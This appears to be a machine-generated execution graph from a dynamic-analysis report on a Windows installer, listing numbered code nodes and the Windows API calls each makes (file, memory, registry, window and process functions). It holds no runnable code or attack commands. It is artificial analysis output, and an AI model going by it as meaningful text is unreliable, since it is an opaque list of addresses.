                                                                                                                execution_graph 4779 10001000 4782 1000101b 4779->4782 4789 10001516 4782->4789 4784 10001020 4785 10001024 4784->4785 4786 10001027 GlobalAlloc 4784->4786 4787 1000153d 3 API calls 4785->4787 4786->4785 4788 10001019 4787->4788 4791 1000151c 4789->4791 4790 10001522 4790->4784 4791->4790 4792 1000152e GlobalFree 4791->4792 4792->4784 4793 402840 4794 402bbf 18 API calls 4793->4794 4796 40284e 4794->4796 4795 402864 4798 405c05 2 API calls 4795->4798 4796->4795 4797 402bbf 18 API calls 4796->4797 4797->4795 4799 40286a 4798->4799 4821 405c2a GetFileAttributesW CreateFileW 4799->4821 4801 402877 4802 402883 GlobalAlloc 4801->4802 4803 40291a 4801->4803 4806 402911 CloseHandle 4802->4806 4807 40289c 4802->4807 4804 402922 DeleteFileW 4803->4804 4805 402935 4803->4805 4804->4805 4806->4803 4822 403258 SetFilePointer 4807->4822 4809 4028a2 4810 403242 ReadFile 4809->4810 4811 4028ab GlobalAlloc 4810->4811 4812 4028bb 4811->4812 4813 4028ef 4811->4813 4814 403027 32 API calls 4812->4814 4815 405cdc WriteFile 4813->4815 4820 4028c8 4814->4820 4816 4028fb GlobalFree 4815->4816 4817 403027 32 API calls 4816->4817 4818 40290e 4817->4818 4818->4806 4819 4028e6 GlobalFree 4819->4813 4820->4819 4821->4801 4822->4809 4823 401cc0 4824 402ba2 18 API calls 4823->4824 4825 401cc7 4824->4825 4826 402ba2 18 API calls 4825->4826 4827 401ccf GetDlgItem 4826->4827 4828 402531 4827->4828 4829 4029c0 4830 402ba2 18 API calls 4829->4830 4831 4029c6 4830->4831 4832 4029f9 4831->4832 4834 40281e 4831->4834 4835 4029d4 4831->4835 4833 406077 18 API calls 4832->4833 4832->4834 4833->4834 4835->4834 4837 405f9c wsprintfW 4835->4837 4837->4834 4199 403c41 4200 403d94 4199->4200 4201 403c59 4199->4201 4203 403de5 4200->4203 4204 403da5 GetDlgItem GetDlgItem 4200->4204 4201->4200 4202 403c65 4201->4202 4206 403c70 SetWindowPos 4202->4206 4207 403c83 4202->4207 4205 403e3f 4203->4205 4213 401389 2 API calls 4203->4213 4208 404119 19 API calls 4204->4208 4209 404165 SendMessageW 4205->4209 4230 403d8f 4205->4230 4206->4207 4210 403ca0 4207->4210 4211 403c88 ShowWindow 4207->4211 4212 403dcf SetClassLongW 4208->4212 4242 403e51 4209->4242 4214 403cc2 4210->4214 4215 403ca8 DestroyWindow 4210->4215 4211->4210 4216 40140b 2 API calls 4212->4216 4217 403e17 4213->4217 4219 403cc7 SetWindowLongW 4214->4219 4220 403cd8 4214->4220 4218 4040c3 4215->4218 4216->4203 4217->4205 4223 403e1b SendMessageW 4217->4223 4229 4040d3 ShowWindow 4218->4229 4218->4230 4219->4230 4221 403d81 4220->4221 4222 403ce4 GetDlgItem 4220->4222 4279 404180 4221->4279 4226 403d14 4222->4226 4227 403cf7 SendMessageW IsWindowEnabled 4222->4227 4223->4230 4224 40140b 2 API calls 4224->4242 4225 4040a4 DestroyWindow EndDialog 4225->4218 4232 403d21 4226->4232 4233 403d68 SendMessageW 4226->4233 4234 403d34 4226->4234 4244 403d19 4226->4244 4227->4226 4227->4230 4229->4230 4231 406077 18 API calls 4231->4242 4232->4233 4232->4244 4233->4221 4237 403d51 4234->4237 4238 403d3c 4234->4238 4236 403d4f 4236->4221 4240 40140b 2 API calls 4237->4240 4241 40140b 2 API calls 4238->4241 4239 404119 19 API calls 4239->4242 4243 403d58 4240->4243 4241->4244 4242->4224 4242->4225 4242->4230 4242->4231 4242->4239 4260 403fe4 DestroyWindow 4242->4260 4270 404119 4242->4270 4243->4221 4243->4244 4276 4040f2 4244->4276 4246 403ecc GetDlgItem 4247 403ee1 4246->4247 4248 403ee9 ShowWindow KiUserCallbackDispatcher 4246->4248 4247->4248 4273 40413b EnableWindow 4248->4273 4250 403f13 EnableWindow 4253 403f27 4250->4253 4251 403f2c GetSystemMenu EnableMenuItem SendMessageW 4252 403f5c SendMessageW 4251->4252 4251->4253 4252->4253 4253->4251 4274 40414e SendMessageW 4253->4274 4275 406055 lstrcpynW 4253->4275 4256 403f8a lstrlenW 4257 406077 18 API calls 4256->4257 4258 403fa0 SetWindowTextW 4257->4258 4259 401389 2 API calls 4258->4259 4259->4242 4260->4218 4261 403ffe CreateDialogParamW 4260->4261 4261->4218 4262 404031 4261->4262 4263 404119 19 API calls 4262->4263 4264 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4263->4264 4265 401389 2 API calls 4264->4265 4266 404082 4265->4266 4266->4230 4267 40408a ShowWindow 4266->4267 4268 404165 SendMessageW 4267->4268 4269 4040a2 4268->4269 4269->4218 4271 406077 18 API calls 4270->4271 4272 404124 SetDlgItemTextW 4271->4272 4272->4246 4273->4250 4274->4253 4275->4256 4277 4040f9 4276->4277 4278 4040ff SendMessageW 4276->4278 4277->4278 4278->4236 4280 404198 GetWindowLongW 4279->4280 4290 404221 4279->4290 4281 4041a9 4280->4281 4280->4290 4282 4041b8 GetSysColor 4281->4282 4283 4041bb 4281->4283 4282->4283 4284 4041c1 SetTextColor 4283->4284 4285 4041cb SetBkMode 4283->4285 4284->4285 4286 4041e3 GetSysColor 4285->4286 4287 4041e9 4285->4287 4286->4287 4288 4041f0 SetBkColor 4287->4288 4289 4041fa 4287->4289 4288->4289 4289->4290 4291 404214 CreateBrushIndirect 4289->4291 4292 40420d DeleteObject 4289->4292 4290->4230 4291->4290 4292->4291 4293 401fc3 4294 401fd5 4293->4294 4304 402087 4293->4304 4316 402bbf 4294->4316 4296 401423 25 API calls 4302 4021e1 4296->4302 4298 402bbf 18 API calls 4299 401fe5 4298->4299 4300 401ffb LoadLibraryExW 4299->4300 4301 401fed GetModuleHandleW 4299->4301 4303 40200c 4300->4303 4300->4304 4301->4300 4301->4303 4322 40649a WideCharToMultiByte 4303->4322 4304->4296 4307 402056 4311 4051b4 25 API calls 4307->4311 4308 40201d 4309 402025 4308->4309 4310 40203c 4308->4310 4367 401423 4309->4367 4325 10001759 4310->4325 4313 40202d 4311->4313 4313->4302 4314 402079 FreeLibrary 4313->4314 4314->4302 4317 402bcb 4316->4317 4318 406077 18 API calls 4317->4318 4319 402bec 4318->4319 4320 401fdc 4319->4320 4321 4062e9 5 API calls 4319->4321 4320->4298 4321->4320 4323 4064c4 GetProcAddress 4322->4323 4324 402017 4322->4324 4323->4324 4324->4307 4324->4308 4326 10001789 4325->4326 4370 10001b18 4326->4370 4328 10001790 4329 100018a6 4328->4329 4330 100017a1 4328->4330 4331 100017a8 4328->4331 4329->4313 4419 10002286 4330->4419 4402 100022d0 4331->4402 4336 100017d7 4351 100017cd 4336->4351 4429 10002b5f 4336->4429 4337 100017be 4341 100017c4 4337->4341 4345 100017cf 4337->4345 4338 1000180c 4342 10001812 4338->4342 4343 1000184e 4338->4343 4339 100017ee 4432 100024a9 4339->4432 4341->4351 4413 100028a4 4341->4413 4347 100015b4 3 API calls 4342->4347 4349 100024a9 10 API calls 4343->4349 4344 100017f4 4443 100015b4 4344->4443 4423 10002645 4345->4423 4353 10001828 4347->4353 4354 10001840 4349->4354 4351->4338 4351->4339 4357 100024a9 10 API calls 4353->4357 4358 10001895 4354->4358 4454 1000246c 4354->4454 4356 100017d5 4356->4351 4357->4354 4358->4329 4362 1000189f GlobalFree 4358->4362 4362->4329 4364 10001881 4364->4358 4458 1000153d wsprintfW 4364->4458 4365 1000187a FreeLibrary 4365->4364 4368 4051b4 25 API calls 4367->4368 4369 401431 4368->4369 4369->4313 4461 1000121b GlobalAlloc 4370->4461 4372 10001b3c 4462 1000121b GlobalAlloc 4372->4462 4374 10001d7a GlobalFree GlobalFree GlobalFree 4375 10001d97 4374->4375 4392 10001de1 4374->4392 4376 100020ee 4375->4376 4385 10001dac 4375->4385 4375->4392 4378 10002110 GetModuleHandleW 4376->4378 4376->4392 4377 10001c1d GlobalAlloc 4395 10001b47 4377->4395 4380 10002121 LoadLibraryW 4378->4380 4381 10002136 4378->4381 4379 10001c86 GlobalFree 4379->4395 4380->4381 4380->4392 4469 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4381->4469 4382 10001c68 lstrcpyW 4383 10001c72 lstrcpyW 4382->4383 4383->4395 4385->4392 4465 1000122c 4385->4465 4386 10002188 4388 10002195 lstrlenW 4386->4388 4386->4392 4387 10002048 4387->4392 4396 10002090 lstrcpyW 4387->4396 4470 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4388->4470 4392->4328 4393 10002148 4393->4386 4401 10002172 GetProcAddress 4393->4401 4394 100021af 4394->4392 4395->4374 4395->4377 4395->4379 4395->4382 4395->4383 4395->4387 4395->4392 4397 10001cc4 4395->4397 4398 10001f37 GlobalFree 4395->4398 4400 1000122c 2 API calls 4395->4400 4468 1000121b GlobalAlloc 4395->4468 4396->4392 4397->4395 4463 1000158f GlobalSize GlobalAlloc 4397->4463 4398->4395 4400->4395 4401->4386 4410 100022e8 4402->4410 4404 10002415 GlobalFree 4408 100017ae 4404->4408 4404->4410 4405 100023d3 lstrlenW 4405->4404 4409 100023d1 4405->4409 4406 100023ba GlobalAlloc 4406->4409 4407 1000238f GlobalAlloc WideCharToMultiByte 4407->4404 4408->4336 4408->4337 4408->4351 4409->4404 4476 100025d9 4409->4476 4410->4404 4410->4405 4410->4406 4410->4407 4411 1000122c GlobalAlloc lstrcpynW 4410->4411 4472 100012ba 4410->4472 4411->4410 4415 100028b6 4413->4415 4414 1000295b VirtualAlloc 4416 10002979 4414->4416 4415->4414 4417 10002a75 4416->4417 4418 10002a6a GetLastError 4416->4418 4417->4351 4418->4417 4420 10002296 4419->4420 4421 100017a7 4419->4421 4420->4421 4422 100022a8 GlobalAlloc 4420->4422 4421->4331 4422->4420 4427 10002661 4423->4427 4424 100026b2 GlobalAlloc 4428 100026d4 4424->4428 4425 100026c5 4426 100026ca GlobalSize 4425->4426 4425->4428 4426->4428 4427->4424 4427->4425 4428->4356 4430 10002b6a 4429->4430 4431 10002baa GlobalFree 4430->4431 4479 1000121b GlobalAlloc 4432->4479 4434 10002530 StringFromGUID2 4436 100024b3 4434->4436 4435 10002541 lstrcpynW 4435->4436 4436->4434 4436->4435 4437 1000250b MultiByteToWideChar 4436->4437 4438 10002554 wsprintfW 4436->4438 4439 10002571 GlobalFree 4436->4439 4440 100025ac GlobalFree 4436->4440 4441 10001272 2 API calls 4436->4441 4480 100012e1 4436->4480 4437->4436 4438->4436 4439->4436 4440->4344 4441->4436 4484 1000121b GlobalAlloc 4443->4484 4445 100015ba 4446 100015c7 lstrcpyW 4445->4446 4448 100015e1 4445->4448 4449 100015fb 4446->4449 4448->4449 4450 100015e6 wsprintfW 4448->4450 4451 10001272 4449->4451 4450->4449 4452 100012b5 GlobalFree 4451->4452 4453 1000127b GlobalAlloc lstrcpynW 4451->4453 4452->4354 4453->4452 4455 1000247a 4454->4455 4456 10001861 4454->4456 4455->4456 4457 10002496 GlobalFree 4455->4457 4456->4364 4456->4365 4457->4455 4459 10001272 2 API calls 4458->4459 4460 1000155e 4459->4460 4460->4358 4461->4372 4462->4395 4464 100015ad 4463->4464 4464->4397 4471 1000121b GlobalAlloc 4465->4471 4467 1000123b lstrcpynW 4467->4392 4468->4395 4469->4393 4470->4394 4471->4467 4473 100012c1 4472->4473 4474 1000122c 2 API calls 4473->4474 4475 100012df 4474->4475 4475->4410 4477 100025e7 VirtualAlloc 4476->4477 4478 1000263d 4476->4478 4477->4478 4478->4409 4479->4436 4481 100012ea 4480->4481 4482 1000130c 4480->4482 4481->4482 4483 100012f0 lstrcpyW 4481->4483 4482->4436 4483->4482 4484->4445 4838 4016c4 4839 402bbf 18 API calls 4838->4839 4840 4016ca GetFullPathNameW 4839->4840 4841 4016e4 4840->4841 4842 401706 4840->4842 4841->4842 4845 406398 2 API calls 4841->4845 4843 40171b GetShortPathNameW 4842->4843 4844 402a4c 4842->4844 4843->4844 4846 4016f6 4845->4846 4846->4842 4848 406055 lstrcpynW 4846->4848 4848->4842 4849 4014cb 4850 4051b4 25 API calls 4849->4850 4851 4014d2 4850->4851 4852 40194e 4853 402bbf 18 API calls 4852->4853 4854 401955 lstrlenW 4853->4854 4855 402531 4854->4855 4856 4027ce 4857 4027d6 4856->4857 4858 4027da FindNextFileW 4857->4858 4861 4027ec 4857->4861 4859 402833 4858->4859 4858->4861 4862 406055 lstrcpynW 4859->4862 4862->4861 4682 401754 4683 402bbf 18 API calls 4682->4683 4684 40175b 4683->4684 4685 405c59 2 API calls 4684->4685 4686 401762 4685->4686 4687 405c59 2 API calls 4686->4687 4687->4686 4863 401d56 GetDC GetDeviceCaps 4864 402ba2 18 API calls 4863->4864 4865 401d74 MulDiv ReleaseDC 4864->4865 4866 402ba2 18 API calls 4865->4866 4867 401d93 4866->4867 4868 406077 18 API calls 4867->4868 4869 401dcc CreateFontIndirectW 4868->4869 4870 402531 4869->4870 4871 401a57 4872 402ba2 18 API calls 4871->4872 4873 401a5d 4872->4873 4874 402ba2 18 API calls 4873->4874 4875 401a05 4874->4875 4876 4014d7 4877 402ba2 18 API calls 4876->4877 4878 4014dd Sleep 4877->4878 4880 402a4c 4878->4880 4881 40155b 4882 4029f2 4881->4882 4885 405f9c wsprintfW 4882->4885 4884 4029f7 4885->4884 4761 401ddc 4762 402ba2 18 API calls 4761->4762 4763 401de2 4762->4763 4764 402ba2 18 API calls 4763->4764 4765 401deb 4764->4765 4766 401df2 ShowWindow 4765->4766 4767 401dfd EnableWindow 4765->4767 4768 402a4c 4766->4768 4767->4768 4886 40385c 4887 403867 4886->4887 4888 40386b 4887->4888 4889 40386e GlobalAlloc 4887->4889 4889->4888 4890 4022df 4891 402bbf 18 API calls 4890->4891 4892 4022ee 4891->4892 4893 402bbf 18 API calls 4892->4893 4894 4022f7 4893->4894 4895 402bbf 18 API calls 4894->4895 4896 402301 GetPrivateProfileStringW 4895->4896 4897 401bdf 4898 402ba2 18 API calls 4897->4898 4899 401be6 4898->4899 4900 402ba2 18 API calls 4899->4900 4901 401bf0 4900->4901 4902 401c00 4901->4902 4903 402bbf 18 API calls 4901->4903 4904 401c10 4902->4904 4905 402bbf 18 API calls 4902->4905 4903->4902 4906 401c1b 4904->4906 4907 401c5f 4904->4907 4905->4904 4909 402ba2 18 API calls 4906->4909 4908 402bbf 18 API calls 4907->4908 4910 401c64 4908->4910 4911 401c20 4909->4911 4912 402bbf 18 API calls 4910->4912 4913 402ba2 18 API calls 4911->4913 4914 401c6d FindWindowExW 4912->4914 4915 401c29 4913->4915 4918 401c8f 4914->4918 4916 401c31 SendMessageTimeoutW 4915->4916 4917 401c4f SendMessageW 4915->4917 4916->4918 4917->4918 4919 401960 4920 402ba2 18 API calls 4919->4920 4921 401967 4920->4921 4922 402ba2 18 API calls 4921->4922 4923 401971 4922->4923 4924 402bbf 18 API calls 4923->4924 4925 40197a 4924->4925 4926 40198e lstrlenW 4925->4926 4927 4019ca 4925->4927 4928 401998 4926->4928 4928->4927 4932 406055 lstrcpynW 4928->4932 4930 4019b3 4930->4927 4931 4019c0 lstrlenW 4930->4931 4931->4927 4932->4930 4933 401662 4934 402bbf 18 API calls 4933->4934 4935 401668 4934->4935 4936 406398 2 API calls 4935->4936 4937 40166e 4936->4937 4938 4019e4 4939 402bbf 18 API calls 4938->4939 4940 4019eb 4939->4940 4941 402bbf 18 API calls 4940->4941 4942 4019f4 4941->4942 4943 4019fb lstrcmpiW 4942->4943 4944 401a0d lstrcmpW 4942->4944 4945 401a01 4943->4945 4944->4945 4485 4025e5 4499 402ba2 4485->4499 4487 40263a ReadFile 4494 4025f4 4487->4494 4498 40272d 4487->4498 4488 4026d3 4488->4494 4488->4498 4502 405d0b SetFilePointer 4488->4502 4489 405cad ReadFile 4489->4494 4491 40267a MultiByteToWideChar 4491->4494 4492 40272f 4511 405f9c wsprintfW 4492->4511 4494->4487 4494->4488 4494->4489 4494->4491 4494->4492 4495 4026a0 SetFilePointer MultiByteToWideChar 4494->4495 4496 402740 4494->4496 4494->4498 4495->4494 4497 402761 SetFilePointer 4496->4497 4496->4498 4497->4498 4500 406077 18 API calls 4499->4500 4501 402bb6 4500->4501 4501->4494 4503 405d27 4502->4503 4504 405d43 4502->4504 4505 405cad ReadFile 4503->4505 4504->4488 4506 405d33 4505->4506 4506->4504 4507 405d74 SetFilePointer 4506->4507 4508 405d4c SetFilePointer 4506->4508 4507->4504 4508->4507 4509 405d57 4508->4509 4510 405cdc WriteFile 4509->4510 4510->4504 4511->4498 4946 401e66 4947 402bbf 18 API calls 4946->4947 4948 401e6c 4947->4948 4949 4051b4 25 API calls 4948->4949 4950 401e76 4949->4950 4951 405735 2 API calls 4950->4951 4952 401e7c 4951->4952 4953 401edb CloseHandle 4952->4953 4954 401e8c WaitForSingleObject 4952->4954 4955 40281e 4952->4955 4953->4955 4956 401e9e 4954->4956 4957 401eb0 GetExitCodeProcess 4956->4957 4958 406467 2 API calls 4956->4958 4959 401ec2 4957->4959 4960 401ecd 4957->4960 4961 401ea5 WaitForSingleObject 4958->4961 4963 405f9c wsprintfW 4959->4963 4960->4953 4961->4956 4963->4960 4521 401767 4522 402bbf 18 API calls 4521->4522 4523 40176e 4522->4523 4524 401796 4523->4524 4525 40178e 4523->4525 4562 406055 lstrcpynW 4524->4562 4561 406055 lstrcpynW 4525->4561 4528 401794 4532 4062e9 5 API calls 4528->4532 4529 4017a1 4530 405a09 3 API calls 4529->4530 4531 4017a7 lstrcatW 4530->4531 4531->4528 4539 4017b3 4532->4539 4533 406398 2 API calls 4533->4539 4534 4017ef 4535 405c05 2 API calls 4534->4535 4535->4539 4537 4017c5 CompareFileTime 4537->4539 4538 401885 4540 4051b4 25 API calls 4538->4540 4539->4533 4539->4534 4539->4537 4539->4538 4542 406055 lstrcpynW 4539->4542 4547 406077 18 API calls 4539->4547 4555 40579a MessageBoxIndirectW 4539->4555 4558 40185c 4539->4558 4560 405c2a GetFileAttributesW CreateFileW 4539->4560 4543 40188f 4540->4543 4541 4051b4 25 API calls 4559 401871 4541->4559 4542->4539 4544 403027 32 API calls 4543->4544 4545 4018a2 4544->4545 4546 4018b6 SetFileTime 4545->4546 4548 4018c8 CloseHandle 4545->4548 4546->4548 4547->4539 4549 4018d9 4548->4549 4548->4559 4550 4018f1 4549->4550 4551 4018de 4549->4551 4552 406077 18 API calls 4550->4552 4553 406077 18 API calls 4551->4553 4554 4018f9 4552->4554 4556 4018e6 lstrcatW 4553->4556 4557 40579a MessageBoxIndirectW 4554->4557 4555->4539 4556->4554 4557->4559 4558->4541 4558->4559 4560->4539 4561->4528 4562->4529 4964 404267 lstrlenW 4965 404286 4964->4965 4966 404288 WideCharToMultiByte 4964->4966 4965->4966 4967 100018a9 4968 100018cc 4967->4968 4969 100018ff GlobalFree 4968->4969 4970 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4968->4970 4969->4970 4971 10001272 2 API calls 4970->4971 4972 10001a87 GlobalFree GlobalFree 4971->4972 4973 401ee9 4974 402bbf 18 API calls 4973->4974 4975 401ef0 4974->4975 4976 406398 2 API calls 4975->4976 4977 401ef6 4976->4977 4979 401f07 4977->4979 4980 405f9c wsprintfW 4977->4980 4980->4979 4981 4021ea 4982 402bbf 18 API calls 4981->4982 4983 4021f0 4982->4983 4984 402bbf 18 API calls 4983->4984 4985 4021f9 4984->4985 4986 402bbf 18 API calls 4985->4986 4987 402202 4986->4987 4988 406398 2 API calls 4987->4988 4989 40220b 4988->4989 4990 40221c lstrlenW lstrlenW 4989->4990 4991 40220f 4989->4991 4993 4051b4 25 API calls 4990->4993 4992 4051b4 25 API calls 4991->4992 4995 402217 4991->4995 4992->4995 4994 40225a SHFileOperationW 4993->4994 4994->4991 4994->4995 4996 40156b 4997 401584 4996->4997 4998 40157b ShowWindow 4996->4998 4999 401592 ShowWindow 4997->4999 5000 402a4c 4997->5000 4998->4997 4999->5000 5001 40456d 5002 4045a3 5001->5002 5003 40457d 5001->5003 5004 404180 8 API calls 5002->5004 5005 404119 19 API calls 5003->5005 5006 4045af 5004->5006 5007 40458a SetDlgItemTextW 5005->5007 5007->5002 5008 40226e 5009 402275 5008->5009 5011 402288 5008->5011 5010 406077 18 API calls 5009->5010 5012 402282 5010->5012 5013 40579a MessageBoxIndirectW 5012->5013 5013->5011 5014 4014f1 SetForegroundWindow 5015 402a4c 5014->5015 5016 401673 5017 402bbf 18 API calls 5016->5017 5018 40167a 5017->5018 5019 402bbf 18 API calls 5018->5019 5020 401683 5019->5020 5021 402bbf 18 API calls 5020->5021 5022 40168c MoveFileW 5021->5022 5023 40169f 5022->5023 5029 401698 5022->5029 5025 406398 2 API calls 5023->5025 5027 4021e1 5023->5027 5024 401423 25 API calls 5024->5027 5026 4016ae 5025->5026 5026->5027 5028 405ef6 38 API calls 5026->5028 5028->5029 5029->5024 5030 4052f3 5031 405314 GetDlgItem GetDlgItem GetDlgItem 5030->5031 5032 40549d 5030->5032 5075 40414e SendMessageW 5031->5075 5034 4054a6 GetDlgItem CreateThread CloseHandle 5032->5034 5035 4054ce 5032->5035 5034->5035 5037 4054f9 5035->5037 5038 4054e5 ShowWindow ShowWindow 5035->5038 5039 40551e 5035->5039 5036 405384 5044 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5036->5044 5041 405533 ShowWindow 5037->5041 5042 40550d 5037->5042 5045 405559 5037->5045 5077 40414e SendMessageW 5038->5077 5043 404180 8 API calls 5039->5043 5048 405553 5041->5048 5049 405545 5041->5049 5046 4040f2 SendMessageW 5042->5046 5047 40552c 5043->5047 5050 4053f9 5044->5050 5051 4053dd SendMessageW SendMessageW 5044->5051 5045->5039 5052 405567 SendMessageW 5045->5052 5046->5039 5057 4040f2 SendMessageW 5048->5057 5056 4051b4 25 API calls 5049->5056 5053 40540c 5050->5053 5054 4053fe SendMessageW 5050->5054 5051->5050 5052->5047 5055 405580 CreatePopupMenu 5052->5055 5059 404119 19 API calls 5053->5059 5054->5053 5058 406077 18 API calls 5055->5058 5056->5048 5057->5045 5060 405590 AppendMenuW 5058->5060 5061 40541c 5059->5061 5062 4055c0 TrackPopupMenu 5060->5062 5063 4055ad GetWindowRect 5060->5063 5064 405425 ShowWindow 5061->5064 5065 405459 GetDlgItem SendMessageW 5061->5065 5062->5047 5066 4055db 5062->5066 5063->5062 5067 405448 5064->5067 5068 40543b ShowWindow 5064->5068 5065->5047 5069 405480 SendMessageW SendMessageW 5065->5069 5070 4055f7 SendMessageW 5066->5070 5076 40414e SendMessageW 5067->5076 5068->5067 5069->5047 5070->5070 5071 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5070->5071 5073 405639 SendMessageW 5071->5073 5073->5073 5074 405662 GlobalUnlock SetClipboardData CloseClipboard 5073->5074 5074->5047 5075->5036 5076->5065 5077->5037 5078 100016b6 5079 100016e5 5078->5079 5080 10001b18 22 API calls 5079->5080 5081 100016ec 5080->5081 5082 100016f3 5081->5082 5083 100016ff 5081->5083 5084 10001272 2 API calls 5082->5084 5085 10001726 5083->5085 5086 10001709 5083->5086 5087 100016fd 5084->5087 5089 10001750 5085->5089 5090 1000172c 5085->5090 5088 1000153d 3 API calls 5086->5088 5092 1000170e 5088->5092 5091 1000153d 3 API calls 5089->5091 5093 100015b4 3 API calls 5090->5093 5091->5087 5094 100015b4 3 API calls 5092->5094 5095 10001731 5093->5095 5096 10001714 5094->5096 5097 10001272 2 API calls 5095->5097 5099 10001272 2 API calls 5096->5099 5098 10001737 GlobalFree 5097->5098 5098->5087 5100 1000174b GlobalFree 5098->5100 5101 1000171a GlobalFree 5099->5101 5100->5087 5101->5087 5102 10002238 5103 10002296 5102->5103 5105 100022cc 5102->5105 5104 100022a8 GlobalAlloc 5103->5104 5103->5105 5104->5103 5106 401cfa GetDlgItem GetClientRect 5107 402bbf 18 API calls 5106->5107 5108 401d2c LoadImageW SendMessageW 5107->5108 5109 401d4a DeleteObject 5108->5109 5110 402a4c 5108->5110 5109->5110 4730 4027fb 4731 402bbf 18 API calls 4730->4731 4732 402802 FindFirstFileW 4731->4732 4733 40282a 4732->4733 4737 402815 4732->4737 4734 402833 4733->4734 4738 405f9c wsprintfW 4733->4738 4739 406055 lstrcpynW 4734->4739 4738->4734 4739->4737 4740 40237b 4741 402381 4740->4741 4742 402bbf 18 API calls 4741->4742 4743 402393 4742->4743 4744 402bbf 18 API calls 4743->4744 4745 40239d RegCreateKeyExW 4744->4745 4746 4023c7 4745->4746 4749 40281e 4745->4749 4747 4023e2 4746->4747 4748 402bbf 18 API calls 4746->4748 4751 402ba2 18 API calls 4747->4751 4753 4023ee 4747->4753 4750 4023d8 lstrlenW 4748->4750 4750->4747 4751->4753 4752 402409 RegSetValueExW 4755 40241f RegCloseKey 4752->4755 4753->4752 4754 403027 32 API calls 4753->4754 4754->4752 4755->4749 5111 1000103d 5112 1000101b 5 API calls 5111->5112 5113 10001056 5112->5113 5114 4014ff 5115 401507 5114->5115 5117 40151a 5114->5117 5116 402ba2 18 API calls 5115->5116 5116->5117 5118 401000 5119 401037 BeginPaint GetClientRect 5118->5119 5120 40100c DefWindowProcW 5118->5120 5122 4010f3 5119->5122 5123 401179 5120->5123 5124 401073 CreateBrushIndirect FillRect DeleteObject 5122->5124 5125 4010fc 5122->5125 5124->5122 5126 401102 CreateFontIndirectW 5125->5126 5127 401167 EndPaint 5125->5127 5126->5127 5128 401112 6 API calls 5126->5128 5127->5123 5128->5127 5129 401904 5130 40193b 5129->5130 5131 402bbf 18 API calls 5130->5131 5132 401940 5131->5132 5133 405846 69 API calls 5132->5133 5134 401949 5133->5134 5135 402d04 5136 402d16 SetTimer 5135->5136 5138 402d2f 5135->5138 5136->5138 5137 402d84 5138->5137 5139 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5138->5139 5139->5137 4512 402786 4513 4029f7 4512->4513 4514 40278d 4512->4514 4515 402ba2 18 API calls 4514->4515 4516 402798 4515->4516 4517 40279f SetFilePointer 4516->4517 4517->4513 4518 4027af 4517->4518 4520 405f9c wsprintfW 4518->4520 4520->4513 4563 100027c7 4564 10002817 4563->4564 4565 100027d7 VirtualProtect 4563->4565 4565->4564 5140 401907 5141 402bbf 18 API calls 5140->5141 5142 40190e 5141->5142 5143 40579a MessageBoxIndirectW 5142->5143 5144 401917 5143->5144 5145 401e08 5146 402bbf 18 API calls 5145->5146 5147 401e0e 5146->5147 5148 402bbf 18 API calls 5147->5148 5149 401e17 5148->5149 5150 402bbf 18 API calls 5149->5150 5151 401e20 5150->5151 5152 402bbf 18 API calls 5151->5152 5153 401e29 5152->5153 5154 401423 25 API calls 5153->5154 5155 401e30 ShellExecuteW 5154->5155 5156 401e61 5155->5156 5162 40490a 5163 404936 5162->5163 5164 40491a 5162->5164 5166 404969 5163->5166 5167 40493c SHGetPathFromIDListW 5163->5167 5173 40577e GetDlgItemTextW 5164->5173 5169 404953 SendMessageW 5167->5169 5170 40494c 5167->5170 5168 404927 SendMessageW 5168->5163 5169->5166 5172 40140b 2 API calls 5170->5172 5172->5169 5173->5168 5174 1000164f 5175 10001516 GlobalFree 5174->5175 5177 10001667 5175->5177 5176 100016ad GlobalFree 5177->5176 5178 10001682 5177->5178 5179 10001699 VirtualFree 5177->5179 5178->5176 5179->5176 4688 402095 4689 402bbf 18 API calls 4688->4689 4690 40209c 4689->4690 4691 402bbf 18 API calls 4690->4691 4692 4020a6 4691->4692 4693 402bbf 18 API calls 4692->4693 4694 4020b0 4693->4694 4695 402bbf 18 API calls 4694->4695 4696 4020ba 4695->4696 4697 402bbf 18 API calls 4696->4697 4699 4020c4 4697->4699 4698 402103 CoCreateInstance 4703 402122 4698->4703 4699->4698 4700 402bbf 18 API calls 4699->4700 4700->4698 4701 401423 25 API calls 4702 4021e1 4701->4702 4703->4701 4703->4702 5180 401a15 5181 402bbf 18 API calls 5180->5181 5182 401a1e ExpandEnvironmentStringsW 5181->5182 5183 401a32 5182->5183 5185 401a45 5182->5185 5184 401a37 lstrcmpW 5183->5184 5183->5185 5184->5185 5186 402515 5187 402bbf 18 API calls 5186->5187 5188 40251c 5187->5188 5191 405c2a GetFileAttributesW CreateFileW 5188->5191 5190 402528 5191->5190 5192 401b16 5193 402bbf 18 API calls 5192->5193 5194 401b1d 5193->5194 5195 402ba2 18 API calls 5194->5195 5196 401b26 wsprintfW 5195->5196 5197 402a4c 5196->5197 5198 10001058 5200 10001074 5198->5200 5199 100010dd 5200->5199 5201 10001516 GlobalFree 5200->5201 5202 10001092 5200->5202 5201->5202 5203 10001516 GlobalFree 5202->5203 5204 100010a2 5203->5204 5205 100010b2 5204->5205 5206 100010a9 GlobalSize 5204->5206 5207 100010b6 GlobalAlloc 5205->5207 5208 100010c7 5205->5208 5206->5205 5209 1000153d 3 API calls 5207->5209 5210 100010d2 GlobalFree 5208->5210 5209->5208 5210->5199 4757 40159b 4758 402bbf 18 API calls 4757->4758 4759 4015a2 SetFileAttributesW 4758->4759 4760 4015b4 4759->4760 4769 40229d 4770 4022a5 4769->4770 4771 4022ab 4769->4771 4772 402bbf 18 API calls 4770->4772 4773 4022b9 4771->4773 4774 402bbf 18 API calls 4771->4774 4772->4771 4775 4022c7 4773->4775 4776 402bbf 18 API calls 4773->4776 4774->4773 4777 402bbf 18 API calls 4775->4777 4776->4775 4778 4022d0 WritePrivateProfileStringW 4777->4778 5211 401f1d 5212 402bbf 18 API calls 5211->5212 5213 401f24 5212->5213 5214 40642b 5 API calls 5213->5214 5215 401f33 5214->5215 5216 401fb7 5215->5216 5217 401f4f GlobalAlloc 5215->5217 5217->5216 5218 401f63 5217->5218 5219 40642b 5 API calls 5218->5219 5220 401f6a 